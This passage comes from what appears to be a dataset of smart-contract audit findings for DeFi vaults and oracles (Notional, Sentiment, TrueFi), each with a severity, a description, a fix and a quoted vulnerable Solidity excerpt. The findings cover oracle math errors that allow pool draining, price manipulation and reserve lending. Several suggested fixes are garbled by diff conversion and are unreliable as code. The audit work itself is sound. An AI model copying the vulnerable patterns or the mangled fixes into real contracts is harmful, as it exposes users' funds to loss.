This is explicitly prevented during redemption.\\n uint256 underlyingValue = convertStrategyToUnderlying(\\n address(0), vaultState.totalStrategyTokens, maturity\\n ).toUint();\\n\\n // Authenticate the minimum purchase amount, all tokens will be sold given this slippage limit.\\n uint256 minAllowedPurchaseAmount = (underlyingValue * settlementSlippageLimit) / SETTLEMENT_SLIPPAGE_PRECISION;\\n require(params.minPurchaseAmount >= minAllowedPurchaseAmount, \"Purchase Limit\");\\n\\n NOTIONAL.redeemStrategyTokensToCash(maturity, strategyTokens, settlementTrade);\\n\\n // If there are no more strategy tokens left, then mark the vault as settled\\n vaultState = NOTIONAL.getVaultState(address(this), maturity);\\n if (vaultState.totalStrategyTokens == 0) {\\n NOTIONAL.settleVault(address(this), maturity);\\n }\\n }\\n```\\n -`CrossCurrencyfCashVault` Cannot Be Upgradedчmediumч`CrossCurrencyfCashVault` cannot be upgraded as it is missing the authorize upgrade method.\\nThe Cross Currency Vault is expected to be upgradeable as:\\nThis vault is similar to the other vaults (Boosted3TokenAuraVault and MetaStable2TokenAuraVault) provided by Notional that are upgradeable by default.\\nThe `BaseStrategyVault` has configured the storage gaps `uint256[45] private __gap` for upgrading purposes\\nClarified with the sponsor and noted that Cross Currency Vault should be upgradeable\\n`CrossCurrencyfCashVault` inherits from `BaseStrategyVault`. However, the `BaseStrategyVault` forget to inherit Openzepplin's `UUPSUpgradeable` contract. 
Therefore, it is missing the authorize upgrade method, and the contract cannot be upgraded.\\n```\\nabstract contract BaseStrategyVault is Initializable, IStrategyVault {\\n using TokenUtils for IERC20;\\n using TradeHandler for Trade;\\n\\n /// @notice Hardcoded on the implementation contract during deployment\\n NotionalProxy public immutable NOTIONAL;\\n ITradingModule public immutable TRADING_MODULE;\\n uint8 constant internal INTERNAL_TOKEN_DECIMALS = 8;\\n \\n ..SNIP..\\n \\n // Storage gap for future potential upgrades\\n uint256[45] private __gap;\\n }\\n```\\n\\n```\\ncontract CrossCurrencyfCashVault is BaseStrategyVault {\\n using TypeConvert for uint256;\\n using TypeConvert for int256;\\n\\n uint256 public constant SETTLEMENT_SLIPPAGE_PRECISION = 1e18;\\n\\n struct DepositParams {\\n // Minimum purchase amount of the lend underlying token, this is\\n // based on the deposit + borrowed amount and must be set to a non-zero\\n // value to establish a slippage limit.\\n uint256 minPurchaseAmount;\\n // Minimum annualized lending rate, can be set to zero for no slippage limit\\n uint32 minLendRate;\\n // ID of the desired DEX to trade on, _depositFromNotional will always trade\\n // using an EXACT_IN_SINGLE trade which is supported by all DEXes\\n uint16 dexId;\\n // Exchange data depending on the selected dexId\\n ..SNIP..\\n```\\nчIt is recommended to Inherit Openzepplin's `UUPSUpgradeable` contract and implement the missing authorize upgrade method.\\n```\\n// Remove the line below\\n abstract contract BaseStrategyVault is Initializable, IStrategyVault {\\n// Add the line below\\n abstract contract BaseStrategyVault is Initializable, IStrategyVault, UUPSUpgradeable {\\n using TokenUtils for IERC20;\\n using TradeHandler for Trade;\\n\\n /// @notice Hardcoded on the implementation contract during deployment\\n NotionalProxy public immutable NOTIONAL;\\n ITradingModule public immutable TRADING_MODULE;\\n uint8 constant internal INTERNAL_TOKEN_DECIMALS = 
8;\\n \\n ..SNIP..\\n \\n// Add the line below\\n function _authorizeUpgrade(\\n// Add the line below\\n address /* newImplementation */\\n// Add the line below\\n ) internal override onlyNotionalOwner {} \\n \\n // Storage gap for future potential upgrades\\n uint256[45] private __gap;\\n }\\n```\\nчIf a critical bug is discovered within the Cross Currency Vault after launching that causes a loss of assets, the vault cannot be upgraded unlike the other balancer-related vaults to fix the bugs. All assets within the vault will be lostч```\\nabstract contract BaseStrategyVault is Initializable, IStrategyVault {\\n using TokenUtils for IERC20;\\n using TradeHandler for Trade;\\n\\n /// @notice Hardcoded on the implementation contract during deployment\\n NotionalProxy public immutable NOTIONAL;\\n ITradingModule public immutable TRADING_MODULE;\\n uint8 constant internal INTERNAL_TOKEN_DECIMALS = 8;\\n \\n ..SNIP..\\n \\n // Storage gap for future potential upgrades\\n uint256[45] private __gap;\\n }\\n```\\n -getGetAmplificationParameter() precision is not used, which result in accounting issue in MetaStable2TokenAuraHelper.sol and in Boosted3TokenAuraHelper.solчmediumчgetGetAmplificationParameter() precision is not used, which result in accounting issue in MetaStable2TokenAuraHelper.sol and in Boosted3TokenAuraHelper.sol\\nThis report has two part,\\npart one trace the accounting issue in MetaStable2TokenAuraHelper.sol,\\npart two trace the accounting issue in Boosted3TokenAuraHelper.sol,\\nboth issue rooted in not handling the getGetAmplificationParameter() precision\\nAccording to the Balancer documentation\\npool.getGetAmplificationParameter()\\nreturns something resembling\\nvalue : 620000 isUpdating : False precision : 1000\\nwhere the amplification parameter is 620000 / 1000 = 620\\nbut in the code, the isUpdating and precision returned is ignored and not used.\\nPart One\\nLet's trace the function reinvestReward in MetaStable2TokenAuraHelper.sol\\n```\\n 
function reinvestReward(\\n MetaStable2TokenAuraStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n )\\n```\\n\\nIt calls\\n```\\n// Make sure we are joining with the right proportion to minimize slippage\\n oracleContext._validateSpotPriceAndPairPrice({\\n poolContext: poolContext,\\n strategyContext: strategyContext,\\n primaryAmount: primaryAmount,\\n secondaryAmount: secondaryAmount\\n });\\n```\\n\\nthen it calls\\n```\\nuint256 spotPrice = _getSpotPrice(oracleContext, poolContext, 0);\\n```\\n\\nthen it calls\\nInsite the function\\n```\\n (uint256 balanceX, uint256 balanceY) = tokenIndex == 0 ?\\n (poolContext.primaryBalance, poolContext.secondaryBalance) :\\n (poolContext.secondaryBalance, poolContext.primaryBalance);\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n oracleContext.ampParam, StableMath._balances(balanceX, balanceY), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice({\\n amplificationParameter: oracleContext.ampParam,\\n invariant: invariant,\\n balanceX: balanceX,\\n balanceY: balanceY\\n });\\n```\\n\\nWhat's wrong with this, I believe the precision has issue for ampParam\\nBecause When we get the oracleContext.ampParam from MetaStable2TokenVaultMixin.sol\\nWe did not use the precision returned from the pool\\n```\\n (\\n uint256 value,\\n /* bool isUpdating */,\\n /* uint256 precision */\\n ) = IMetaStablePool(address(BALANCER_POOL_TOKEN)).getAmplificationParameter();\\n```\\n\\nAccording to the Balancer documentation\\npool.getGetAmplificationParameter()\\nreturns something resembling\\nvalue : 620000 isUpdating : False precision : 1000\\nwhere the amplification parameter is 620000 / 1000 = 620\\nThe formula that calculate the spot price is\\n```\\n /**************************************************************************************************************\\n // //\\n // 2.a.x.y + a.y^2 + b.y //\\n // spot price Y/X = - dx/dy = ----------------------- //\\n // 2.a.x.y + a.x^2 + b.x 
//\\n // //\\n // n = 2 //\\n // a = amp param * n //\\n // b = D + a.(S - D) //\\n // D = invariant //\\n // S = sum of balances but x,y = 0 since x and y are the only tokens //\\n **************************************************************************************************************/\\n```\\n\\nthe function _calcSpotPrice hardcode the amp precision to 1e3;\\n```\\n uint256 internal constant _AMP_PRECISION = 1e3;\\n```\\n\\nand implement\\n```\\nuint256 a = (amplificationParameter * 2) / _AMP_PRECISION;\\n```\\n\\nif the pool's ampParameter is not equal to _AMP_PRECISION, the math will break.\\nPart Two\\nLet's trace the call in Boosted3TokenPoolUtils.sol\\nFirst the function reinvestReward in Boosted3TokenAuraHelper.sol is called\\n```\\n function reinvestReward(\\n Boosted3TokenAuraStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n ) \\n```\\n\\nThen we call\\n```\\n uint256 minBPT = context.poolContext._getMinBPT(\\n oracleContext, strategyContext, primaryAmount\\n );\\n```\\n\\nthen we call\\n```\\n minBPT = StableMath._calcBptOutGivenExactTokensIn({\\n amp: oracleContext.ampParam,\\n balances: balances,\\n amountsIn: amountsIn,\\n bptTotalSupply: virtualSupply,\\n swapFeePercentage: 0,\\n currentInvariant: invariant\\n });\\n```\\n\\nthen we call\\n```\\n // Get current and new invariants, taking swap fees into account\\n uint256 newInvariant = _calculateInvariant(amp, newBalances, false);\\n uint256 invariantRatio = newInvariant.divDown(currentInvariant);\\n```\\n\\nthen we call\\n```\\n uint256 ampTimesTotal = amplificationParameter * numTokens;\\n```\\n\\nwe just use the amplificationParameter without handling the precision.\\nThe amplificationParameter comes from BoostedTokenPoolMixin.sol\\n```\\n (\\n uint256 value,\\n /* bool isUpdating */,\\n /* uint256 precision */\\n ) = pool.getAmplificationParameter();\\n```\\n\\nthe isUpdating and precision is not used,\\nhowever, according to the documentation\\nAccording to the 
Balancer documentation\\npool.getGetAmplificationParameter()\\nreturns something resembling\\nvalue : 620000 isUpdating : False precision : 1000\\nwhere the amplification parameter is 620000 / 1000 = 620чIssue getGetAmplificationParameter() precision is not used, which result in accounting issue in MetaStable2TokenAuraHelper.sol and in Boosted3TokenAuraHelper.sol\\nWe recommend the project use the precision returned from getGetAmplificationParameter()\\n```\\n (\\n uint256 value,\\n bool isUpdating */,\\n uint256 precision */\\n ) = IMetaStablePool(address(BALANCER_POOL_TOKEN)).getAmplificationParameter();\\n return value / precision;\\n```\\nчThe amplificationParameter has precision, ignoring the precision will result in accounting issue.\\nIf the precision of the amplificationParameter is not equal to hardcoded 1e3, the spot price is invalid.\\nthe code\\n```\\n uint256 ampTimesTotal = amplificationParameter * numTokens;\\n```\\n\\nwill be overvalued because we did not divide the value by the precision.ч```\\n function reinvestReward(\\n MetaStable2TokenAuraStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n )\\n```\\n -When one of the plugins is broken or paused, `deposit()` or `withdraw()` of the whole Vault contract can malfunctionчmediumчOne malfunctioning plugin can result in the whole Vault contract malfunctioning.\\nA given plugin can temporally or even permanently becomes malfunctioning (cannot deposit/withdraw) for all sorts of reasons.\\nEg, Aave V2 Lending Pool can be paused, which will prevent multiple core functions that the Aave v2 plugin depends on from working, including `lendingPool.deposit()` and `lendingPool.withdraw()`.\\n```\\n modifier whenNotPaused() {\\n _whenNotPaused();\\n _;\\n }\\n```\\n\\n```\\n function withdraw(\\n address asset,\\n uint256 amount,\\n address to\\n ) external override whenNotPaused returns (uint256) {\\n```\\n\\nThat's because the deposit will always goes to the first plugin, and withdraw 
from the last plugin first.чIssue When one of the plugins is broken or paused, `deposit()` or `withdraw()` of the whole Vault contract can malfunction\\nConsider introducing a new method to pause one plugin from the Vault contract level;\\nAave V2's Lending Pool contract has a view function `paused()`, consider returning `0` for `availableForDeposit()` and ``availableForWithdrawal() when pool paused in AaveV2Plugin:\\n```\\nfunction availableForDeposit() public view override returns (uint256) {\\n if (lendingPool.paused()) return 0;\\n return type(uint256).max - balance();\\n}\\n```\\n\\n```\\nfunction availableForWithdrawal() public view override returns (uint256) {\\n if (lendingPool.paused()) return 0;\\n return balance();\\n}\\n```\\nчWhen Aave V2 Lending Pool is paused, users won't be able to deposit or withdraw from the vault.\\nNeither can the owner remove the plugin nor rebalanced it to other plugins to resume operation.\\nBecause withdrawal from the plugin can not be done, and removing a plugin or rebalancing both rely on this.ч```\\n modifier whenNotPaused() {\\n _whenNotPaused();\\n _;\\n }\\n```\\n -`_withdrawFromPlugin()` will revert when `_withdrawalValues[i] == 0`чmediumчWhen `_withdrawalValues[i] == 0` in `rebalancePlugins()`, it means NOT to rebalance this plugin.\\nHowever, the current implementation still tries to withdraw 0 from the plugin.\\nThis will revert in AaveV2Plugin as Aave V2's `validateWithdraw()` does not allow `0` withdrawals:\\n```\\n function validateWithdraw(\\n address reserveAddress,\\n uint256 amount,\\n uint256 userBalance,\\n mapping(address => DataTypes.ReserveData) storage reservesData,\\n DataTypes.UserConfigurationMap storage userConfig,\\n mapping(uint256 => address) storage reserves,\\n uint256 reservesCount,\\n address oracle\\n ) external view {\\n require(amount != 0, Errors.VL_INVALID_AMOUNT);\\n```\\n\\n`removePlugin()` will also always `_withdrawFromPlugin()` even if the plugin's balance is 0, as it will also 
tries to withdraw 0 in that case (balance is 0).чOnly call `_withdrawFromPlugin()` when IPlugin(pluginAddr).balance() > 0:\\n```\\nfunction removePlugin(uint256 _index) external onlyOwner {\\n require(_index < pluginCount, \"Index out of bounds\");\\n address pluginAddr = plugins[_index];\\n if (IPlugin(pluginAddr).balance() > 0){\\n _withdrawFromPlugin(pluginAddr, IPlugin(pluginAddr).balance());\\n }\\n uint256 pointer = _index;\\n while (pointer < pluginCount - 1) {\\n plugins[pointer] = plugins[pointer + 1];\\n pointer++;\\n }\\n delete plugins[pluginCount - 1];\\n pluginCount--;\\n\\n IERC20(LINK).approve(pluginAddr, 0);\\n\\n emit PluginRemoved(pluginAddr);\\n}\\n```\\n\\n```\\nfunction rebalancePlugins(uint256[] memory _withdrawalValues) external onlyOwner {\\n require(_withdrawalValues.length == pluginCount, \"Invalid withdrawal values\");\\n for (uint256 i = 0; i < pluginCount; i++) {\\n if (_withdrawalValues[i] > 0)\\n _withdrawFromPlugin(plugins[i], _withdrawalValues[i]);\\n }\\n _distributeToPlugins();\\n}\\n```\\nчFor AaveV2Plugin (and any future plugins that dont allow withdraw 0):\\nIn every rebalance call, it must at least withdraw 1 wei from the plugin for the rebalance to work.\\nThe plugin can not be removed or rebalanced when there is no balance in it.\\nIf such a plugin can not deposit for some reason (paused by gov, AaveV2Plugin may face that), this will further cause the whole system unable to be rebalanced until the deposit resumes for that plugin.ч```\\n function validateWithdraw(\\n address reserveAddress,\\n uint256 amount,\\n uint256 userBalance,\\n mapping(address => DataTypes.ReserveData) storage reservesData,\\n DataTypes.UserConfigurationMap storage userConfig,\\n mapping(uint256 => address) storage reserves,\\n uint256 reservesCount,\\n address oracle\\n ) external view {\\n require(amount != 0, Errors.VL_INVALID_AMOUNT);\\n```\\n -Unregulated joining feesчmediumчObserve the _deposit function\\nThis makes call to join 
function\\n```\\nfunction join(uint256 amount) external override joiningNotPaused {\\n uint256 fee = amount.mul(joiningFee).div(BASIS_PRECISION);\\n uint256 mintedAmount = mint(amount.sub(fee));\\n claimableFees = claimableFees.add(fee);\\n\\n // TODO: tx.origin will be deprecated in a future ethereum upgrade\\n latestJoinBlock[tx.origin] = block.number;\\n token.safeTransferFrom(msg.sender, address(this), amount);\\n\\n emit Joined(msg.sender, amount, mintedAmount);\\n }\\n```\\n\\nAs we can see this join function deducts a fees from the deposited amount before minting. Lets see this joining fees\\nThe joining fees is introduced using setJoiningFee function\\n```\\nfunction setJoiningFee(uint256 fee) external onlyOwner {\\n require(fee <= BASIS_PRECISION, \"TrueFiPool: Fee cannot exceed transaction value\");\\n joiningFee = fee;\\n emit JoiningFeeChanged(fee);\\n }\\n```\\n\\nThis means the joiningFee will always be in between 0 to BASIS_PRECISION. This BASIS_PRECISION can be 100% as shown\\n```\\nuint256 private constant BASIS_PRECISION = 10000;\\n```\\n\\nThis means if joiningFee is set to BASIS_PRECISION then all user deposit will goto joining fees with user getting nothingчIssue Unregulated joining fees\\nPost calling join, check amount of shares minted for this user (use balanceOF on TrueFiPool2.sol) and if it is below minimum expected revert the transaction\\n```\\nuint256 tfUsdcBalance = tfUSDC.balanceOf(address(this));\\nrequire(tfUsdcBalance>=minSharesExpected, \"Too high fees\");\\n```\\nчContract will lose all deposited fundsч```\\nfunction join(uint256 amount) external override joiningNotPaused {\\n uint256 fee = amount.mul(joiningFee).div(BASIS_PRECISION);\\n uint256 mintedAmount = mint(amount.sub(fee));\\n claimableFees = claimableFees.add(fee);\\n\\n // TODO: tx.origin will be deprecated in a future ethereum upgrade\\n latestJoinBlock[tx.origin] = block.number;\\n token.safeTransferFrom(msg.sender, address(this), amount);\\n\\n emit 
Joined(msg.sender, amount, mintedAmount);\\n }\\n```\\n -CTokenOracle.sol#getCErc20Price contains critical math errorчhighчCTokenOracle.sol#getCErc20Price contains a math error that immensely overvalues CTokens\\nCTokenOracle.sol#L66-L76\\n```\\nfunction getCErc20Price(ICToken cToken, address underlying) internal view returns (uint) {\\n /*\\n cToken Exchange rates are scaled by 10^(18 - 8 + underlying token decimals) so to scale\\n the exchange rate to 18 decimals we must multiply it by 1e8 and then divide it by the\\n number of decimals in the underlying token. Finally to find the price of the cToken we\\n must multiply this value with the current price of the underlying token\\n */\\n return cToken.exchangeRateStored()\\n .mulDivDown(1e8 , IERC20(underlying).decimals())\\n .mulWadDown(oracle.getPrice(underlying));\\n}\\n```\\n\\nIn L74, IERC20(underlying).decimals() is not raised to the power of 10. The results in the price of the LP being overvalued by many order of magnitudes. A user could deposit one CToken and drain the reserves of every liquidity pool.чIssue CTokenOracle.sol#getCErc20Price contains critical math error\\nFix the math error by changing L74:\\n```\\nreturn cToken.exchangeRateStored()\\n.mulDivDown(1e8 , 10 ** IERC20(underlying).decimals())\\n.mulWadDown(oracle.getPrice(underlying));\\n \\n```\\n\\nSentiment Team\\nFixed as recommended. PR here.\\nLead Senior Watson\\nConfirmed fix.чAll lenders could be drained of all their funds due to excessive over valuation of CTokens cause by this errorч```\\nfunction getCErc20Price(ICToken cToken, address underlying) internal view returns (uint) {\\n /*\\n cToken Exchange rates are scaled by 10^(18 - 8 + underlying token decimals) so to scale\\n the exchange rate to 18 decimals we must multiply it by 1e8 and then divide it by the\\n number of decimals in the underlying token. 
Finally to find the price of the cToken we\\n must multiply this value with the current price of the underlying token\\n */\\n return cToken.exchangeRateStored()\\n .mulDivDown(1e8 , IERC20(underlying).decimals())\\n .mulWadDown(oracle.getPrice(underlying));\\n}\\n```\\n -Protocol Reserve Within A LToken Vault Can Be Lent OutчmediumчProtocol reserve, which serves as a liquidity backstop or to compensate the protocol, within a LToken vault can be lent out to the borrowers.\\nThe purpose of the protocol reserve within a LToken vault is to compensate the protocol or serve as a liquidity backstop. However, based on the current setup, it is possible for the protocol reserve within a Ltoken vault to be lent out.\\nThe following functions within the `LToken` contract show that the protocol reserve is intentionally preserved by removing the protocol reserve from the calculation of total assets within a `LToken` vault. As such, whenever the Liquidity Providers (LPs) attempt to redeem their LP token, the protocol reserves will stay intact and will not be withdrawn by the LPs.\\n```\\nfunction totalAssets() public view override returns (uint) {\\n return asset.balanceOf(address(this)) + getBorrows() - getReserves();\\n}\\n```\\n\\n```\\nfunction getBorrows() public view returns (uint) {\\n return borrows + borrows.mulWadUp(getRateFactor());\\n}\\n```\\n\\n```\\nfunction getReserves() public view returns (uint) {\\n return reserves + borrows.mulWadUp(getRateFactor())\\n .mulWadUp(reserveFactor);\\n}\\n```\\n\\nHowever, this measure is not applied consistently across the protocol. 
The following `lendTo` function shows that as long as the borrower has sufficient collateral to ensure their account remains healthy, the borrower could borrow as many assets from the LToken vault as they wish.\\nIn the worst-case scenario, the borrower can borrow all the assets from the LToken vault, including the protocol reserve.\\n```\\nFile: LToken.sol\\n /**\\n @notice Lends a specified amount of underlying asset to an account\\n @param account Address of account\\n @param amt Amount of token to lend\\n @return isFirstBorrow Returns if the account is borrowing the asset for\\n the first time\\n */\\n function lendTo(address account, uint amt)\\n external\\n whenNotPaused\\n accountManagerOnly\\n returns (bool isFirstBorrow)\\n {\\n updateState();\\n isFirstBorrow = (borrowsOf[account] == 0);\\n\\n uint borrowShares;\\n require((borrowShares = convertAssetToBorrowShares(amt)) != 0, \"ZERO_BORROW_SHARES\");\\n totalBorrowShares += borrowShares;\\n borrowsOf[account] += borrowShares;\\n\\n borrows += amt;\\n asset.safeTransfer(account, amt);\\n return isFirstBorrow;\\n }\\n```\\nчIssue Protocol Reserve Within A LToken Vault Can Be Lent Out\\nConsider updating the `lendTo` function to ensure that the protocol reserve is preserved and cannot be lent out. 
If the underlying asset of a LToken vault is less than or equal to the protocol reserve, the lending should be paused as it is more important to preserve the protocol reserve compared to lending them out.\\n```\\nfunction lendTo(address account, uint amt)\\n external\\n whenNotPaused\\n accountManagerOnly\\n returns (bool isFirstBorrow)\\n{\\n updateState();\\n isFirstBorrow = (borrowsOf[account] == 0);\\n \\n require\\n\\n uint borrowShares;\\n require((borrowShares = convertAssetToBorrowShares(amt)) != 0, \"ZERO_BORROW_SHARES\");\\n totalBorrowShares // Add the line below\\n= borrowShares;\\n borrowsOf[account] // Add the line below\\n= borrowShares;\\n\\n borrows // Add the line below\\n= amt;\\n asset.safeTransfer(account, amt);\\n \\n// Add the line below\\n require(asset.balanceOf(address(this)) >= getReserves(), \"Not enough liquidity for lending\") \\n \\n return isFirstBorrow;\\n}\\n```\\n\\nSentiment Team\\nWe removed reserves completely in this PR.\\nLead Senior Watson\\nConfirmed fix.чThe purpose of the protocol reserve within a LToken vault is to compensate the protocol or serve as a liquidity backstop. Without the protocol reserve, the protocol will become illiquidity, and there is no fund to compensate the protocol.ч```\\nfunction totalAssets() public view override returns (uint) {\\n return asset.balanceOf(address(this)) + getBorrows() - getReserves();\\n}\\n```\\n -ERC4626Oracle Vulnerable To Price ManipulationчmediumчERC4626 oracle is vulnerable to price manipulation. This allows an attacker to increase or decrease the price to carry out various attacks against the protocol.\\nThe `getPrice` function within the `ERC4626Oracle` contract is vulnerable to price manipulation because the price can be increased or decreased within a single transaction/block.\\nBased on the `getPrice` function, the price of the LP token of an ERC4626 vault is dependent on the `ERC4626.previewRedeem` and `oracleFacade.getPrice` functions. 
If the value returns by either `ERC4626.previewRedeem` or `oracleFacade.getPrice` can be manipulated within a single transaction/block, the price of the LP token of an ERC4626 vault is considered to be vulnerable to price manipulation.\\n```\\nFile: ERC4626Oracle.sol\\n function getPrice(address token) external view returns (uint) {\\n uint decimals = IERC4626(token).decimals();\\n return IERC4626(token).previewRedeem(\\n 10 ** decimals\\n ).mulDivDown(\\n oracleFacade.getPrice(IERC4626(token).asset()),\\n 10 ** decimals\\n );\\n }\\n```\\n\\nIt was observed that the `ERC4626.previewRedeem` couldbe manipulated within a single transaction/block. As shown below, the `previewRedeem` function will call the `convertToAssets` function. Within the `convertToAssets`, the number of assets per share is calculated based on the current/spot total assets and current/spot supply that can be increased or decreased within a single block/transaction by calling the vault's deposit, mint, withdraw or redeem functions. This allows the attacker to artificially inflate or deflate the price within a single block/transaction.\\n```\\nFile: ERC4626.sol\\n function previewRedeem(uint256 shares) public view virtual returns (uint256) {\\n return convertToAssets(shares);\\n }\\n```\\n\\n```\\nFile: ERC4626.sol\\n function convertToAssets(uint256 shares) public view virtual returns (uint256) {\\n uint256 supply = totalSupply; // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? shares : shares.mulDivDown(totalAssets(), supply);\\n }\\n```\\nчAvoid using `previewRedeem` function to calculate the price of the LP token of an ERC4626 vault. 
Consider implementing TWAP so that the price cannot be inflated or deflated within a single block/transaction or within a short period of time.\\nSentiment Team\\nDepends on the integration itself, so there's no action that can be taken right now.\\nLead Senior Watson\\nAcknowledged.чThe attacker could perform price manipulation to make the apparent value of an asset to be much higher or much lower than the true value of the asset. Following are some risks of price manipulation:\\nAn attacker can increase the value of their collaterals to increase their borrowing power so that they can borrow more assets than they are allowed from Sentiment.\\nAn attacker can decrease the value of some collaterals and attempt to liquidate another user account prematurely.ч```\\nFile: ERC4626Oracle.sol\\n function getPrice(address token) external view returns (uint) {\\n uint decimals = IERC4626(token).decimals();\\n return IERC4626(token).previewRedeem(\\n 10 ** decimals\\n ).mulDivDown(\\n oracleFacade.getPrice(IERC4626(token).asset()),\\n 10 ** decimals\\n );\\n }\\n```\\n -`Reserves` should not be considered part of the available liquidity while calculating the interest rateчmediumчThe implementation is different from the documentation regarding the interest rate formula.\\nThe formula given in the docs:\\nCalculates Borrow rate per second:\\n$$ Borrow Rate Per Second = c3 \\cdot (util \\cdot c1 + util^{32} \\cdot c1 + util^{64} \\cdot c2) \\div secsPerYear $$\\nwhere, $util = borrows \\div (liquidity - reserves + borrows)$\\n$$ util=borrows \\div (liquidity−reserves+borrows) $$\\n```\\n function getRateFactor() internal view returns (uint) {\\n return (block.timestamp == lastUpdated) ?\\n 0 :\\n ((block.timestamp - lastUpdated)*1e18)\\n .mulWadUp(\\n rateModel.getBorrowRatePerSecond(\\n asset.balanceOf(address(this)),\\n borrows\\n )\\n );\\n }\\n```\\n\\nHowever, the current implementation is taking all the balance as the liquidity:\\n```\\n function getBorrowRatePerSecond(\\n 
uint liquidity,\\n uint borrows\\n )\\n external\\n view\\n returns (uint)\\n {\\n uint util = _utilization(liquidity, borrows);\\n return c3.mulDivDown(\\n (\\n util.mulWadDown(c1)\\n + util.rpow(32, SCALE).mulWadDown(c1)\\n + util.rpow(64, SCALE).mulWadDown(c2)\\n ),\\n secsPerYear\\n );\\n }\\n```\\n\\n```\\n function _utilization(uint liquidity, uint borrows)\\n internal\\n pure\\n returns (uint)\\n {\\n uint totalAssets = liquidity + borrows;\\n return (totalAssets == 0) ? 0 : borrows.divWadDown(totalAssets);\\n }\\n```\\nчIssue `Reserves` should not be considered part of the available liquidity while calculating the interest rate\\nThe implementation of `getRateFactor()` can be updated to:\\n```\\nfunction getRateFactor() internal view returns (uint) {\\n return (block.timestamp == lastUpdated) ?\\n 0 :\\n ((block.timestamp - lastUpdated)*1e18)\\n .mulWadUp(\\n rateModel.getBorrowRatePerSecond(\\n asset.balanceOf(address(this)) - reserves,\\n borrows\\n )\\n );\\n}\\n```\\n\\nSentiment Team\\nRemoved reserves from LToken and added an alternate mechanism to collect direct fees.\\nLead Senior Watson\\noriginationFee may result in the borrower account becoming liquidatable immediately (aka WP-M2).\\nSentiment Team\\nFixed as recommended. PR here.\\nLead Senior Watson\\nriskEngine.isBorrowAllowed should be removed as it's no longer needed.\\nSentiment Team\\nPushed a commit to remove the redundant call to riskEngine. 
PR here.чPer the docs, when calculating the interest rate, `util` is the ratio of available liquidity to the `borrows`, available liquidity should not include reserves.\\nThe current implementation is using all the balance as the `liquidity`, this will make the interest rate lower than expectation.\\nPoC\\nGiven:\\n`asset.address(this) + borrows = 10000`\\n`reserves = 1500, borrows = 7000`\\nExpected result:\\nWhen calculating `getRateFactor()`, available liquidity should be `asset.balanceOf(address(this)) - reserves = 1500, util = 7000 / 8500 = 0.82`, `getBorrowRatePerSecond() = 9114134329`\\nActual result:\\nWhen calculating `getRateFactor()`, `asset.balanceOf(address(this)) = 3000, util = 0.7e18`, `getBorrowRatePerSecond() = 7763863430`\\nThe actual interest rate is only `7763863430 / 9114134329 = 85%` of the expected rate.ч```\\n function getRateFactor() internal view returns (uint) {\\n return (block.timestamp == lastUpdated) ?\\n 0 :\\n ((block.timestamp - lastUpdated)*1e18)\\n .mulWadUp(\\n rateModel.getBorrowRatePerSecond(\\n asset.balanceOf(address(this)),\\n borrows\\n )\\n );\\n }\\n```\\n -LToken's implmentation is not fully up to EIP-4626's specificationчmediumчNote: This issue is a part of the extra scope added by Sentiment AFTER the audit contest. This scope was only reviewed by WatchPug and relates to these three PRs:\\nLending deposit cap\\nFee accrual modification\\nCRV staking\\nLToken's implmentation is not fully up to EIP-4626's specification. This issue is would actually be considered a Low issue if it were a part of a Sherlock contest.\\n```\\nfunction maxMint(address) public view virtual returns (uint256) {\\n return type(uint256).max;\\n}\\n```\\n\\nMUST return the maximum amount of shares mint would allow to be deposited to receiver and not cause a revert, which MUST NOT be higher than the actual maximum that would be accepted (it should underestimate if necessary). This assumes that the user has infinite assets, i.e. 
MUST NOT rely on balanceOf of asset.\\nmaxMint() and maxDeposit() should reflect the limitation of maxSupply.чmaxMint() and maxDeposit() should reflect the limitation of maxSupply.\\nConsider changing maxMint() and maxDeposit() to:\\n```\\nfunction maxMint(address) public view virtual returns (uint256) {\\n if (totalSupply >= maxSupply) {\\n return 0;\\n }\\n return maxSupply - totalSupply;\\n}\\n```\\n\\n```\\nfunction maxDeposit(address) public view virtual returns (uint256) {\\n return convertToAssets(maxMint(address(0)));\\n}\\n```\\n\\nSentiment Team\\nFixed as recommended. PR here.\\nLead Senior Watson\\nConfirmed fix.чCould cause unexpected behavior in the future due to non-compliance with EIP-4626 standard.ч```\\nfunction maxMint(address) public view virtual returns (uint256) {\\n return type(uint256).max;\\n}\\n```\\n -`UniV2LPOracle` will malfunction if token0 or token1's `decimals != 18`чhighчWhen one of the LP token's underlying tokens `decimals` is not 18, the price of the LP token calculated by `UniV2LPOracle` will be wrong.\\n`UniV2LPOracle` is an implementation of Alpha Homora v2's Fair Uniswap's LP Token Pricing Formula:\\nThe Formula ... 
of combining fair asset prices and fair asset reserves:\\n$$ P = 2\\cdot \\frac{\\sqrt{r_0 \\cdot r_1} \\cdot \\sqrt{p_0\\cdot p_1}}{totalSupply}, $$\\nwhere $r_i$ is the asset ii's pool balance and $p_i$ is the asset $i$'s fair price.\\nHowever, the current implementation wrongful assumes $r_0$ and $r_1$ are always in 18 decimals.\\n```\\nfunction getPrice(address pair) external view returns (uint) {\\n (uint r0, uint r1,) = IUniswapV2Pair(pair).getReserves();\\n\\n // 2 * sqrt(r0 * r1 * p0 * p1) / totalSupply\\n return FixedPointMathLib.sqrt(\\n r0\\n .mulWadDown(r1)\\n .mulWadDown(oracle.getPrice(IUniswapV2Pair(pair).token0()))\\n .mulWadDown(oracle.getPrice(IUniswapV2Pair(pair).token1()))\\n )\\n .mulDivDown(2e27, IUniswapV2Pair(pair).totalSupply());\\n}\\n```\\n\\n```\\nuint256 internal constant WAD = 1e18; // The scalar of ETH and most ERC20s.\\n\\nfunction mulWadDown(uint256 x, uint256 y) internal pure returns (uint256) {\\n return mulDivDown(x, y, WAD); // Equivalent to (x * y) / WAD rounded down.\\n}\\n```\\n\\n```\\nfunction mulDivDown(\\n uint256 x,\\n uint256 y,\\n uint256 denominator\\n) internal pure returns (uint256 z) {\\n assembly {\\n // Store x * y in z for now.\\n z := mul(x, y)\\n\\n // Equivalent to require(denominator != 0 && (x == 0 || (x * y) / x == y))\\n if iszero(and(iszero(iszero(denominator)), or(iszero(x), eq(div(z, x), y)))) {\\n revert(0, 0)\\n }\\n\\n // Divide z by the denominator.\\n z := div(z, denominator)\\n }\\n}\\n```\\nчIssue `UniV2LPOracle` will malfunction if token0 or 